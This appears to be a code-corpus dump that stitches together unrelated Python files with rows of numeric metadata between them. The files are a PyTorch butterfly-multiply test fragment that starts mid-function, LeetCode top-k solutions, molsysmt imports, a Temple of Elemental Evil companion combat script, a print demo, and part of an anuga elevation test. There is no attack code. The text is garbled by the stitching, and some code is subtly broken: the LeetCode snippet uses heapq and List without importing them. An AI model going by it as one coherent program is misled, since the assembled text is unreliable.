d_twiddle, d_input = butterfly_ortho_multiply_untied_backward_fast(twiddle_fast_cos, twiddle_fast_sin,
output, grad, increasing_stride)
# d_twiddle, d_input = torch.autograd.grad(output, (twiddle_fast, input), grad, retain_graph=True)
d_twiddle_old, d_input_old = torch.autograd.grad(output_old, (twiddle, input), grad, retain_graph=True)
self.assertTrue(torch.allclose(d_input, d_input_old, rtol=self.rtol, atol=self.atol),
((d_input - d_input_old).abs().max().item(), device, increasing_stride))
if not increasing_stride:
d_twiddle_old = d_twiddle_old.flip(1)
self.assertTrue(torch.allclose(d_twiddle, d_twiddle_old, rtol=self.rtol * (10 if batch_size > 1024 else 1),
atol=self.atol * (10 if batch_size > 1024 else 1)),
(((d_twiddle - d_twiddle_old) / d_twiddle_old).abs().max().item(),
(batch_size, n), device, increasing_stride))
def test_butterfly_odo_untied_fast(self):
for batch_size, n in [(2048, 512)]:
m = int(math.log2(n))
nstack = 1
nblocks = 4
# for device in ['cpu'] + ([] if not torch.cuda.is_available() else ['cuda']):
for device in ['cuda']:
if batch_size > 1024 and (device == 'cpu'):
continue
twiddle = torch.rand((nstack, nblocks * 2 * m, n // 2), requires_grad=True, device=device) * 2 * math.pi
# diagonal = torch.randn((nstack, nblocks, n), requires_grad=True, device=device)
# Not numerically stable so we need diagonals to be away from zero
diagonal = torch.rand((nstack, nblocks, n), requires_grad=True, device=device) + 0.1
# diagonal = torch.ones((nstack, nblocks, n), requires_grad=True, device=device) * 0.1
input = torch.randn((batch_size, nstack, n), requires_grad=True, device=twiddle.device)
twiddle_fast_cos, twiddle_fast_sin = twiddle.cos(), twiddle.sin()
output = butterfly_odo_multiply_untied_forward_fast(twiddle_fast_cos, twiddle_fast_sin,
diagonal, input)
# output_old = butterfly_odo_mult_untied_torch(twiddle, input)
output_old = input
for block in range(nblocks):
output_old = butterfly_ortho_mult_untied(twiddle[:, block * 2 * m:(block * 2 + 1) * m].flip(1), output_old, False)
output_old = output_old * diagonal[:, block]
output_old = butterfly_ortho_mult_untied(twiddle[:, (block * 2 + 1) * m:(block + 1) * 2 * m], output_old, True)
self.assertTrue(torch.allclose(output, output_old, rtol=self.rtol, atol=self.atol),
((output - output_old).abs().max().item(), device))
grad = torch.randn_like(output)
# d_twiddle, d_diagonal, d_input = butterfly_odo_multiply_untied_backward_fast(twiddle_fast_cos, twiddle_fast_sin,
# diagonal, output, grad)
d_twiddle, d_diagonal, d_input = butterfly_odo_multiply_untied_forward_backward_fast(twiddle_fast_cos, twiddle_fast_sin,
diagonal, input, grad)
# d_twiddle, d_input = torch.autograd.grad(output, (twiddle_fast, input), grad, retain_graph=True)
d_twiddle_old, d_diagonal_old, d_input_old = torch.autograd.grad(output_old, (twiddle, diagonal, input), grad, retain_graph=True)
self.assertTrue(torch.allclose(d_input, d_input_old, rtol=self.rtol, atol=self.atol),
((d_input - d_input_old).abs().max().item(), device))
self.assertTrue(torch.allclose(d_diagonal, d_diagonal_old, rtol=self.rtol * (10 if batch_size > 1024 else 1),
atol=self.atol * (10 if batch_size > 1024 else 1)),
((d_diagonal - d_diagonal_old).abs().max().item(), device))
self.assertTrue(torch.allclose(d_twiddle, d_twiddle_old, rtol=self.rtol * (10 if batch_size > 1024 else 1),
atol=self.atol * (10 if batch_size > 1024 else 1)),
(((d_twiddle - d_twiddle_old) / d_twiddle_old).abs().max().item(),
(batch_size, n), device))
if __name__ == "__main__":
unittest.main()
| 74.307818 | 176 | 0.571507 | 5,431 | 45,625 | 4.545572 | 0.035537 | 0.064487 | 0.047393 | 0.059059 | 0.938956 | 0.918905 | 0.908575 | 0.886499 | 0.854944 | 0.830316 | 0 | 0.022214 | 0.320175 | 45,625 | 613 | 177 | 74.429038 | 0.773705 | 0.114784 | 0 | 0.717391 | 0 | 0 | 0.00335 | 0 | 0 | 0 | 0 | 0.001631 | 0.106719 | 1 | 0.039526 | false | 0 | 0.051383 | 0 | 0.092885 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
6d3fe2b7b7c589872a009d32d8048bee52672000 | 646 | py | Python | top-k-frequent-elements.py | 11aparna91/LeetCodesPython | 317ddd963122e082ced8a6510bd04255d59b6c35 | [
"MIT"
] | 1 | 2021-10-06T00:07:30.000Z | 2021-10-06T00:07:30.000Z | top-k-frequent-elements.py | 11aparna91/LeetCodesPython | 317ddd963122e082ced8a6510bd04255d59b6c35 | [
"MIT"
] | null | null | null | top-k-frequent-elements.py | 11aparna91/LeetCodesPython | 317ddd963122e082ced8a6510bd04255d59b6c35 | [
"MIT"
] | null | null | null | ##################################### Problem Number 347 ###################################
from collections import Counter
class Solution:
def topKFrequent(self, nums: List[int], k: int) -> List[int]:
count=Counter(nums)
return heapq.nlargest(k,count,key=count.get)
#######################################################################Solution 2 ##################
from collections import Counter
class Solution:
def topKFrequent(self, nums: List[int], k: int) -> List[int]:
count=Counter(nums)
return heapq.nlargest(k,count.keys(),key=count.get)
| 30.761905 | 101 | 0.459752 | 60 | 646 | 4.95 | 0.4 | 0.094276 | 0.141414 | 0.188552 | 0.828283 | 0.828283 | 0.828283 | 0.828283 | 0.828283 | 0.828283 | 0 | 0.007859 | 0.212074 | 646 | 20 | 102 | 32.3 | 0.575639 | 0.044892 | 0 | 0.8 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.2 | false | 0 | 0.2 | 0 | 0.8 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
6d52b3e969f57db4437166f72002726f98667759 | 210 | py | Python | molsysmt/elements/component/__init__.py | dprada/molsysmt | 83f150bfe3cfa7603566a0ed4aed79d9b0c97f5d | [
"MIT"
] | null | null | null | molsysmt/elements/component/__init__.py | dprada/molsysmt | 83f150bfe3cfa7603566a0ed4aed79d9b0c97f5d | [
"MIT"
] | null | null | null | molsysmt/elements/component/__init__.py | dprada/molsysmt | 83f150bfe3cfa7603566a0ed4aed79d9b0c97f5d | [
"MIT"
] | null | null | null | from .component import component_index_from_atom, component_id_from_component
from .component import component_name_from_component, component_type_from_component
from .component import n_components_from_system
| 52.5 | 83 | 0.909524 | 29 | 210 | 6.068966 | 0.37931 | 0.443182 | 0.323864 | 0.318182 | 0.363636 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.066667 | 210 | 3 | 84 | 70 | 0.897959 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 8 |
edd65fc35cd4444707d24be5f298f3b399c5d977 | 17,390 | py | Python | tpdatasrc/co8fixes/scr/py00041animal_companion.py | edoipi/TemplePlus | f0e552289822fea908f16daa379fa568b1bd286d | [
"MIT"
] | 69 | 2015-05-05T14:09:25.000Z | 2022-02-15T06:13:04.000Z | tpdatasrc/co8fixes/scr/py00041animal_companion.py | edoipi/TemplePlus | f0e552289822fea908f16daa379fa568b1bd286d | [
"MIT"
] | 457 | 2015-05-01T22:07:45.000Z | 2022-03-31T02:19:10.000Z | tpdatasrc/co8fixes/scr/py00041animal_companion.py | edoipi/TemplePlus | f0e552289822fea908f16daa379fa568b1bd286d | [
"MIT"
] | 25 | 2016-02-04T21:19:53.000Z | 2021-11-15T23:14:51.000Z | from toee import *
from utilities import *
from py00439script_daemon import *
from combat_standard_routines import *
def san_start_combat( attachee, triggerer ):
if (attachee.leader_get() != OBJ_HANDLE_NULL and not npc_get(attachee,2)):
leader = attachee.leader_get()
if (group_pc_percent_hp( attachee, leader ) <= 40):
attachee.obj_set_int(obj_f_critter_strategy, 462)
elif (game.party_npc_size() + game.party_pc_size() == 8):
for pp in range(0,8):
if (game.party[pp] != OBJ_HANDLE_NULL):
if (obj_percent_hp(game.party[pp]) <= 50 and game.party[pp].stat_level_get(stat_hp_current) >= -9):
game.global_flags[250 + pp] = 1
game.global_flags[258] = 1
if (game.global_flags[250] == 1):
if (adjacent(attachee, game.party[0])):
game.global_flags[259] = 1
if (game.global_flags[251] == 1):
if (adjacent(attachee, game.party[1])):
game.global_flags[259] = 1
if (game.global_flags[252] == 1):
if (adjacent(attachee, game.party[2])):
game.global_flags[259] = 1
if (game.global_flags[253] == 1):
if (adjacent(attachee, game.party[3])):
game.global_flags[259] = 1
if (game.global_flags[254] == 1):
if (adjacent(attachee, game.party[4])):
game.global_flags[259] = 1
if (game.global_flags[255] == 1):
if (adjacent(attachee, game.party[5])):
game.global_flags[259] = 1
if (game.global_flags[256] == 1):
if (adjacent(attachee, game.party[6])):
game.global_flags[259] = 1
if (game.global_flags[257] == 1):
if (adjacent(attachee, game.party[7])):
game.global_flags[259] = 1
if (game.global_flags[258] == 1):
if (game.global_flags[259] == 1):
attachee.obj_set_int(obj_f_critter_strategy, 464)
if (triggerer.type == obj_t_npc and triggerer.leader_get() == OBJ_HANDLE_NULL):
attachee.turn_towards(triggerer)
else:
for pc in game.party:
if ( pc.has_feat(feat_animal_companion) ):
attachee.turn_towards(pc)
else:
attachee.turn_towards(game.party[0])
else:
attachee.obj_set_int(obj_f_critter_strategy, 463)
else:
attachee.obj_set_int(obj_f_critter_strategy, 464)
if (triggerer.type == obj_t_npc and triggerer.leader_get() == OBJ_HANDLE_NULL):
attachee.turn_towards(triggerer)
else:
for pc in game.party:
if ( pc.has_feat(feat_animal_companion) ):
attachee.turn_towards(pc)
else:
attachee.turn_towards(game.party[0])
elif (game.party_npc_size() + game.party_pc_size() == 7):
if (obj_percent_hp(game.party[0]) <= 50 and game.party[0].stat_level_get(stat_hp_current) >= -9):
game.global_flags[250] = 1
game.global_flags[258] = 1
if (obj_percent_hp(game.party[1]) <= 50 and game.party[1].stat_level_get(stat_hp_current) >= -9):
game.global_flags[251] = 1
game.global_flags[258] = 1
if (obj_percent_hp(game.party[2]) <= 50 and game.party[2].stat_level_get(stat_hp_current) >= -9):
game.global_flags[252] = 1
game.global_flags[258] = 1
if (obj_percent_hp(game.party[3]) <= 50 and game.party[3].stat_level_get(stat_hp_current) >= -9):
game.global_flags[253] = 1
game.global_flags[258] = 1
if (obj_percent_hp(game.party[4]) <= 50 and game.party[4].stat_level_get(stat_hp_current) >= -9):
game.global_flags[254] = 1
game.global_flags[258] = 1
if (obj_percent_hp(game.party[5]) <= 50 and game.party[5].stat_level_get(stat_hp_current) >= -9):
game.global_flags[255] = 1
game.global_flags[258] = 1
if (obj_percent_hp(game.party[6]) <= 50 and game.party[6].stat_level_get(stat_hp_current) >= -9):
game.global_flags[256] = 1
game.global_flags[258] = 1
if (game.global_flags[250] == 1):
if (adjacent(attachee, game.party[0])):
game.global_flags[259] = 1
if (game.global_flags[251] == 1):
if (adjacent(attachee, game.party[1])):
game.global_flags[259] = 1
if (game.global_flags[252] == 1):
if (adjacent(attachee, game.party[2])):
game.global_flags[259] = 1
if (game.global_flags[253] == 1):
if (adjacent(attachee, game.party[3])):
game.global_flags[259] = 1
if (game.global_flags[254] == 1):
if (adjacent(attachee, game.party[4])):
game.global_flags[259] = 1
if (game.global_flags[255] == 1):
if (adjacent(attachee, game.party[5])):
game.global_flags[259] = 1
if (game.global_flags[256] == 1):
if (adjacent(attachee, game.party[6])):
game.global_flags[259] = 1
if (game.global_flags[258] == 1):
if (game.global_flags[259] == 1):
attachee.obj_set_int(obj_f_critter_strategy, 464)
if (triggerer.type == obj_t_npc and triggerer.leader_get() == OBJ_HANDLE_NULL):
attachee.turn_towards(triggerer)
else:
for pc in game.party:
if ( pc.has_feat(feat_animal_companion) ):
attachee.turn_towards(pc)
else:
attachee.turn_towards(game.party[0])
else:
attachee.obj_set_int(obj_f_critter_strategy, 463)
else:
attachee.obj_set_int(obj_f_critter_strategy, 464)
if (triggerer.type == obj_t_npc and triggerer.leader_get() == OBJ_HANDLE_NULL):
attachee.turn_towards(triggerer)
else:
for pc in game.party:
if ( pc.has_feat(feat_animal_companion) ):
attachee.turn_towards(pc)
else:
attachee.turn_towards(game.party[0])
elif (game.party_npc_size() + game.party_pc_size() == 6):
if (obj_percent_hp(game.party[0]) <= 50 and game.party[0].stat_level_get(stat_hp_current) >= -9):
game.global_flags[250] = 1
game.global_flags[258] = 1
if (obj_percent_hp(game.party[1]) <= 50 and game.party[1].stat_level_get(stat_hp_current) >= -9):
game.global_flags[251] = 1
game.global_flags[258] = 1
if (obj_percent_hp(game.party[2]) <= 50 and game.party[2].stat_level_get(stat_hp_current) >= -9):
game.global_flags[252] = 1
game.global_flags[258] = 1
if (obj_percent_hp(game.party[3]) <= 50 and game.party[3].stat_level_get(stat_hp_current) >= -9):
game.global_flags[253] = 1
game.global_flags[258] = 1
if (obj_percent_hp(game.party[4]) <= 50 and game.party[4].stat_level_get(stat_hp_current) >= -9):
game.global_flags[254] = 1
game.global_flags[258] = 1
if (obj_percent_hp(game.party[5]) <= 50 and game.party[5].stat_level_get(stat_hp_current) >= -9):
game.global_flags[255] = 1
game.global_flags[258] = 1
if (game.global_flags[250] == 1):
if (adjacent(attachee, game.party[0])):
game.global_flags[259] = 1
if (game.global_flags[251] == 1):
if (adjacent(attachee, game.party[1])):
game.global_flags[259] = 1
if (game.global_flags[252] == 1):
if (adjacent(attachee, game.party[2])):
game.global_flags[259] = 1
if (game.global_flags[253] == 1):
if (adjacent(attachee, game.party[3])):
game.global_flags[259] = 1
if (game.global_flags[254] == 1):
if (adjacent(attachee, game.party[4])):
game.global_flags[259] = 1
if (game.global_flags[255] == 1):
if (adjacent(attachee, game.party[5])):
game.global_flags[259] = 1
if (game.global_flags[258] == 1):
if (game.global_flags[259] == 1):
attachee.obj_set_int(obj_f_critter_strategy, 464)
if (triggerer.type == obj_t_npc and triggerer.leader_get() == OBJ_HANDLE_NULL):
attachee.turn_towards(triggerer)
else:
for pc in game.party:
if ( pc.has_feat(feat_animal_companion) ):
attachee.turn_towards(pc)
else:
attachee.turn_towards(game.party[0])
else:
attachee.obj_set_int(obj_f_critter_strategy, 463)
else:
attachee.obj_set_int(obj_f_critter_strategy, 464)
if (triggerer.type == obj_t_npc and triggerer.leader_get() == OBJ_HANDLE_NULL):
attachee.turn_towards(triggerer)
else:
for pc in game.party:
if ( pc.has_feat(feat_animal_companion) ):
attachee.turn_towards(pc)
else:
attachee.turn_towards(game.party[0])
elif (game.party_npc_size() + game.party_pc_size() == 5):
if (obj_percent_hp(game.party[0]) <= 50 and game.party[0].stat_level_get(stat_hp_current) >= -9):
game.global_flags[250] = 1
game.global_flags[258] = 1
if (obj_percent_hp(game.party[1]) <= 50 and game.party[1].stat_level_get(stat_hp_current) >= -9):
game.global_flags[251] = 1
game.global_flags[258] = 1
if (obj_percent_hp(game.party[2]) <= 50 and game.party[2].stat_level_get(stat_hp_current) >= -9):
game.global_flags[252] = 1
game.global_flags[258] = 1
if (obj_percent_hp(game.party[3]) <= 50 and game.party[3].stat_level_get(stat_hp_current) >= -9):
game.global_flags[253] = 1
game.global_flags[258] = 1
if (obj_percent_hp(game.party[4]) <= 50 and game.party[4].stat_level_get(stat_hp_current) >= -9):
game.global_flags[254] = 1
game.global_flags[258] = 1
if (game.global_flags[250] == 1):
if (adjacent(attachee, game.party[0])):
game.global_flags[259] = 1
if (game.global_flags[251] == 1):
if (adjacent(attachee, game.party[1])):
game.global_flags[259] = 1
if (game.global_flags[252] == 1):
if (adjacent(attachee, game.party[2])):
game.global_flags[259] = 1
if (game.global_flags[253] == 1):
if (adjacent(attachee, game.party[3])):
game.global_flags[259] = 1
if (game.global_flags[254] == 1):
if (adjacent(attachee, game.party[4])):
game.global_flags[259] = 1
if (game.global_flags[258] == 1):
if (game.global_flags[259] == 1):
attachee.obj_set_int(obj_f_critter_strategy, 464)
if (triggerer.type == obj_t_npc and triggerer.leader_get() == OBJ_HANDLE_NULL):
attachee.turn_towards(triggerer)
else:
for pc in game.party:
if ( pc.has_feat(feat_animal_companion) ):
attachee.turn_towards(pc)
else:
attachee.turn_towards(game.party[0])
else:
attachee.obj_set_int(obj_f_critter_strategy, 463)
else:
attachee.obj_set_int(obj_f_critter_strategy, 464)
if (triggerer.type == obj_t_npc and triggerer.leader_get() == OBJ_HANDLE_NULL):
attachee.turn_towards(triggerer)
else:
for pc in game.party:
if ( pc.has_feat(feat_animal_companion) ):
attachee.turn_towards(pc)
else:
attachee.turn_towards(game.party[0])
elif (game.party_npc_size() + game.party_pc_size() == 4):
if (obj_percent_hp(game.party[0]) <= 50 and game.party[0].stat_level_get(stat_hp_current) >= -9):
game.global_flags[250] = 1
game.global_flags[258] = 1
if (obj_percent_hp(game.party[1]) <= 50 and game.party[1].stat_level_get(stat_hp_current) >= -9):
game.global_flags[251] = 1
game.global_flags[258] = 1
if (obj_percent_hp(game.party[2]) <= 50 and game.party[2].stat_level_get(stat_hp_current) >= -9):
game.global_flags[252] = 1
game.global_flags[258] = 1
if (obj_percent_hp(game.party[3]) <= 50 and game.party[3].stat_level_get(stat_hp_current) >= -9):
game.global_flags[253] = 1
game.global_flags[258] = 1
if (game.global_flags[250] == 1):
if (adjacent(attachee, game.party[0])):
game.global_flags[259] = 1
if (game.global_flags[251] == 1):
if (adjacent(attachee, game.party[1])):
game.global_flags[259] = 1
if (game.global_flags[252] == 1):
if (adjacent(attachee, game.party[2])):
game.global_flags[259] = 1
if (game.global_flags[253] == 1):
if (adjacent(attachee, game.party[3])):
game.global_flags[259] = 1
if (game.global_flags[258] == 1):
if (game.global_flags[259] == 1):
attachee.obj_set_int(obj_f_critter_strategy, 464)
if (triggerer.type == obj_t_npc and triggerer.leader_get() == OBJ_HANDLE_NULL):
attachee.turn_towards(triggerer)
else:
for pc in game.party:
if ( pc.has_feat(feat_animal_companion) ):
attachee.turn_towards(pc)
else:
attachee.turn_towards(game.party[0])
else:
attachee.obj_set_int(obj_f_critter_strategy, 463)
else:
attachee.obj_set_int(obj_f_critter_strategy, 464)
if (triggerer.type == obj_t_npc and triggerer.leader_get() == OBJ_HANDLE_NULL):
attachee.turn_towards(triggerer)
else:
for pc in game.party:
if ( pc.has_feat(feat_animal_companion) ):
attachee.turn_towards(pc)
else:
attachee.turn_towards(game.party[0])
elif (game.party_npc_size() + game.party_pc_size() == 3):
if (obj_percent_hp(game.party[0]) <= 50 and game.party[0].stat_level_get(stat_hp_current) >= -9):
game.global_flags[250] = 1
game.global_flags[258] = 1
if (obj_percent_hp(game.party[1]) <= 50 and game.party[1].stat_level_get(stat_hp_current) >= -9):
game.global_flags[251] = 1
game.global_flags[258] = 1
if (obj_percent_hp(game.party[2]) <= 50 and game.party[2].stat_level_get(stat_hp_current) >= -9):
game.global_flags[252] = 1
game.global_flags[258] = 1
if (game.global_flags[250] == 1):
if (adjacent(attachee, game.party[0])):
game.global_flags[259] = 1
if (game.global_flags[251] == 1):
if (adjacent(attachee, game.party[1])):
game.global_flags[259] = 1
if (game.global_flags[252] == 1):
if (adjacent(attachee, game.party[2])):
game.global_flags[259] = 1
if (game.global_flags[258] == 1):
if (game.global_flags[259] == 1):
attachee.obj_set_int(obj_f_critter_strategy, 464)
if (triggerer.type == obj_t_npc and triggerer.leader_get() == OBJ_HANDLE_NULL):
attachee.turn_towards(triggerer)
else:
for pc in game.party:
if ( pc.has_feat(feat_animal_companion) ):
attachee.turn_towards(pc)
else:
attachee.turn_towards(game.party[0])
else:
attachee.obj_set_int(obj_f_critter_strategy, 463)
else:
attachee.obj_set_int(obj_f_critter_strategy, 464)
if (triggerer.type == obj_t_npc and triggerer.leader_get() == OBJ_HANDLE_NULL):
attachee.turn_towards(triggerer)
else:
for pc in game.party:
if ( pc.has_feat(feat_animal_companion) ):
attachee.turn_towards(pc)
else:
attachee.turn_towards(game.party[0])
elif (game.party_npc_size() + game.party_pc_size() == 2):
if (obj_percent_hp(game.party[0]) <= 50 and game.party[0].stat_level_get(stat_hp_current) >= -9):
game.global_flags[250] = 1
game.global_flags[258] = 1
if (obj_percent_hp(game.party[1]) <= 50 and game.party[1].stat_level_get(stat_hp_current) >= -9):
game.global_flags[251] = 1
game.global_flags[258] = 1
if (game.global_flags[250] == 1):
if (adjacent(attachee, game.party[0])):
game.global_flags[259] = 1
if (game.global_flags[251] == 1):
if (adjacent(attachee, game.party[1])):
game.global_flags[259] = 1
if (game.global_flags[258] == 1):
if (game.global_flags[259] == 1):
attachee.obj_set_int(obj_f_critter_strategy, 464)
if (triggerer.type == obj_t_npc and triggerer.leader_get() == OBJ_HANDLE_NULL):
attachee.turn_towards(triggerer)
else:
for pc in game.party:
if ( pc.has_feat(feat_animal_companion) ):
attachee.turn_towards(pc)
else:
attachee.turn_towards(game.party[0])
else:
attachee.obj_set_int(obj_f_critter_strategy, 463)
else:
attachee.obj_set_int(obj_f_critter_strategy, 464)
if (triggerer.type == obj_t_npc and triggerer.leader_get() == OBJ_HANDLE_NULL):
attachee.turn_towards(triggerer)
else:
for pc in game.party:
if ( pc.has_feat(feat_animal_companion) ):
attachee.turn_towards(pc)
else:
attachee.turn_towards(game.party[0])
elif (game.party_pc_size() == 1):
if (obj_percent_hp(game.party[0]) <= 50 and game.party[0].stat_level_get(stat_hp_current) >= -9):
game.global_flags[250] = 1
game.global_flags[258] = 1
if (game.global_flags[250] == 1):
if (adjacent(attachee, game.party[0])):
game.global_flags[259] = 1
if (game.global_flags[258] == 1):
if (game.global_flags[259] == 1):
attachee.obj_set_int(obj_f_critter_strategy, 464)
if (triggerer.type == obj_t_npc and triggerer.leader_get() == OBJ_HANDLE_NULL):
attachee.turn_towards(triggerer)
else:
for pc in game.party:
if ( pc.has_feat(feat_animal_companion) ):
attachee.turn_towards(pc)
else:
attachee.turn_towards(game.party[0])
else:
attachee.obj_set_int(obj_f_critter_strategy, 463)
else:
attachee.obj_set_int(obj_f_critter_strategy, 464)
if (triggerer.type == obj_t_npc and triggerer.leader_get() == OBJ_HANDLE_NULL):
attachee.turn_towards(triggerer)
else:
for pc in game.party:
if ( pc.has_feat(feat_animal_companion) ):
attachee.turn_towards(pc)
else:
attachee.turn_towards(game.party[0])
game.global_flags[250] = 0
game.global_flags[251] = 0
game.global_flags[252] = 0
game.global_flags[253] = 0
game.global_flags[254] = 0
game.global_flags[255] = 0
game.global_flags[256] = 0
game.global_flags[257] = 0
game.global_flags[258] = 0
game.global_flags[259] = 0
return RUN_DEFAULT
def san_join( attachee, triggerer ):
if (npc_get(attachee,1)):
npc_set(attachee,2)
return RUN_DEFAULT
def san_spell_cast( attachee, triggerer, spell ):
if ( spell.spell == spell_charm_person_or_animal or spell.spell == spell_charm_monster ):
npc_set(attachee,1)
return RUN_DEFAULT
def not_adjacent( companion, target ):
if (companion.distance_to(target) >= 5):
return 1
return 0
def adjacent( companion, target ):
if (companion.distance_to(target) <= 5):
return 1
return 0 | 39.885321 | 104 | 0.668143 | 2,709 | 17,390 | 4.032853 | 0.03433 | 0.142792 | 0.214188 | 0.061876 | 0.939863 | 0.931808 | 0.925767 | 0.925675 | 0.92238 | 0.919176 | 0 | 0.065042 | 0.185739 | 17,390 | 436 | 105 | 39.885321 | 0.706497 | 0 | 0 | 0.894118 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.011765 | false | 0 | 0.009412 | 0 | 0.037647 | 0 | 0 | 0 | 0 | null | 0 | 1 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
edfbaf352e8d4f3f04dd8453683d5053fa972138 | 267 | py | Python | caracteres.py | fmbdti/Arte_em_ASCII | 39293344e78e79d1016f557b08150f791e2ca1aa | [
"MIT"
] | null | null | null | caracteres.py | fmbdti/Arte_em_ASCII | 39293344e78e79d1016f557b08150f791e2ca1aa | [
"MIT"
] | null | null | null | caracteres.py | fmbdti/Arte_em_ASCII | 39293344e78e79d1016f557b08150f791e2ca1aa | [
"MIT"
] | null | null | null | print("O jeito difícil")
print ("##############################")
print ("##############################")
print ("##############################")
print("O jeito fácil")
print ("#" * 30)
print ("#" * 30)
print ("#" * 30)
print ("/\ " * 10)
print (" \/" * 10)
| 17.8 | 40 | 0.314607 | 21 | 267 | 4 | 0.333333 | 0.357143 | 0.428571 | 0.333333 | 0.309524 | 0 | 0 | 0 | 0 | 0 | 0 | 0.044248 | 0.153558 | 267 | 14 | 41 | 19.071429 | 0.327434 | 0 | 0 | 0.6 | 0 | 0 | 0.483146 | 0.337079 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 7 |
612aa8a9c636e6e96a3e0bbc62177878e209d523 | 202 | py | Python | simple_grpc_chat/frontend/src/__init__.py | vdshk/simple-grpc-chat | 09329a95108ea1cc72c901226112fdc65b3c3e76 | [
"MIT"
] | null | null | null | simple_grpc_chat/frontend/src/__init__.py | vdshk/simple-grpc-chat | 09329a95108ea1cc72c901226112fdc65b3c3e76 | [
"MIT"
] | null | null | null | simple_grpc_chat/frontend/src/__init__.py | vdshk/simple-grpc-chat | 09329a95108ea1cc72c901226112fdc65b3c3e76 | [
"MIT"
] | null | null | null | from simple_grpc_chat.frontend.src.client import *
from simple_grpc_chat.frontend.src.server import *
from simple_grpc_chat.frontend.src.login import *
from simple_grpc_chat.frontend.src.start import *
| 40.4 | 50 | 0.841584 | 32 | 202 | 5.0625 | 0.34375 | 0.246914 | 0.345679 | 0.444444 | 0.82716 | 0.82716 | 0.648148 | 0 | 0 | 0 | 0 | 0 | 0.079208 | 202 | 4 | 51 | 50.5 | 0.870968 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 8 |
612b73cbc646a252f4c3f6ab8f1eaac7586ce866 | 44,916 | py | Python | anuga/operators/tests/test_set_elevation_operator.py | samcom12/anuga_core | f4378114dbf02d666fe6423de45798add5c42806 | [
"Python-2.0",
"OLDAP-2.7"
] | 136 | 2015-05-07T05:47:43.000Z | 2022-02-16T03:07:40.000Z | anuga/operators/tests/test_set_elevation_operator.py | samcom12/anuga_core | f4378114dbf02d666fe6423de45798add5c42806 | [
"Python-2.0",
"OLDAP-2.7"
] | 184 | 2015-05-03T09:27:54.000Z | 2021-12-20T04:22:48.000Z | anuga/operators/tests/test_set_elevation_operator.py | samcom12/anuga_core | f4378114dbf02d666fe6423de45798add5c42806 | [
"Python-2.0",
"OLDAP-2.7"
] | 70 | 2015-03-18T07:35:22.000Z | 2021-11-01T07:07:29.000Z | """ Test set operators - stage elevation erosion.
"""
from __future__ import division
from past.utils import old_div
import unittest, os
import anuga
from anuga import Domain
from anuga import Reflective_boundary
from anuga import rectangular_cross_domain
from anuga import file_function
from anuga.config import netcdf_mode_r, netcdf_mode_w, netcdf_mode_a
from anuga.file_conversion.file_conversion import timefile2netcdf
from anuga.config import time_format
from anuga.operators.set_elevation_operator import *
from pprint import pprint
import numpy as num
import warnings
import time
class Test_set_elevation_operator(unittest.TestCase):
def setUp(self):
pass
def tearDown(self):
pass
def test_set_elevation_operator_simple_1_5(self):
from anuga.config import rho_a, rho_w, eta_w
from math import pi, cos, sin
a = [0.0, 0.0]
b = [0.0, 2.0]
c = [2.0, 0.0]
d = [0.0, 4.0]
e = [2.0, 2.0]
f = [4.0, 0.0]
points = [a, b, c, d, e, f]
# bac, bce, ecf, dbe
vertices = [[1,0,2], [1,2,4], [4,2,5], [3,1,4]]
domain = Domain(points, vertices)
domain.set_flow_algorithm('1_5')
#Flat surface with 1m of water
domain.set_quantity('elevation', 0)
domain.set_quantity('stage', 1.0)
domain.set_quantity('friction', 0)
stage_c = domain.quantities['stage'].centroid_values
elev_c = domain.quantities['elevation'].centroid_values
height_c = stage_c - elev_c
integral0 = num.sum(height_c)
Br = Reflective_boundary(domain)
domain.set_boundary({'exterior': Br})
# print domain.quantities['stage'].centroid_values
# print domain.quantities['xmomentum'].centroid_values
# print domain.quantities['ymomentum'].centroid_values
# Apply operator to these triangles
indices = [0,1,3]
elev = 3.0
operator = Set_elevation_operator(domain, elevation=elev, indices=indices)
# Apply Operator
domain.timestep = 2.0
operator()
height_c = stage_c - elev_c
integral1 = num.sum(height_c)
assert integral0 == integral1
